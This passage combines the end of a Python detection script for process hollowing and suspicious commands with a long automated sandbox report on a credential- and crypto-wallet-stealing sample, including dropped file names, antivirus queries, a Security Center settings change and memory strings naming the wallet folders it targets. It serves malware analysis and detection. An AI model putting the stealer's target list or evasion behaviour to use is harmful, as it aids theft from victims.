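            if hollowing_chain_present(apis):
                hits.setdefault("process-hollowing", []).append(f.group("fid"))
            continue
        p = PROC_RE.search(line)
        if p:
            for tag in classify_command(p.group("parent"), p.group("child"), p.group("cmd")):
                hits.setdefault(tag, []).append(p.group("child"))
    return hits


if __name__ == "__main__":
    for tag, sources in triage(SAMPLE_LINES).items():
        print("%-40s %s" % (tag, ", ".join(sources)))
```

The hollowing check is a subsequence match rather than an exact sequence because the report interleaves the stages with GetProcAddress, VirtualAlloc and ReadProcessMemory calls; a benign tasklist invocation produces no tag, which is the behaviour to keep when extending the rules.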
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021B007 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F048 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F299 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F334 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F587 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F5E6 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F6BB EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F706 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F7AD GetLocaleInfoW,GetLocaleInfoW,GetACP
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021F8B3 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021AB0C GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021B007 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F048 GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F8B3 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F299 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F334 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021AB0C GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F587 EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F5E6 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F6BB EnumSystemLocalesW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F706 GetLocaleInfoW
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021F7AD GetLocaleInfoW,GetLocaleInfoW,GetACP
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\Desktop\Launcher.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exeQueries volume information: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exeQueries volume information: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeCode function: 28_2_0020E6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,28_2_0020E6D7
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
                      Source: svchost.exe, 00000006.00000002.2498789197.00000255BAD02000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 00000006.00000002.2498789197.00000255BAD02000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmp, xzuucncwbxucqic.exe, 0000001D.00000003.1693701683.000000000158E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Stealing of Sensitive Information

                      Source: Yara matchFile source: 29.2.xzuucncwbxucqic.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.xzuucncwbxucqic.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001D.00000002.2494852918.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1861315526.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000003.1865638072.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000038.00000002.1935737498.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000003.1865565180.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lectrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets",
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: h\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1693365047.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":209715oH
                      Source: xzuucncwbxucqic.exe, 0000001D.00000003.1598928091.0000000001548000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                      Source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: (insertion_info.second) == (true)
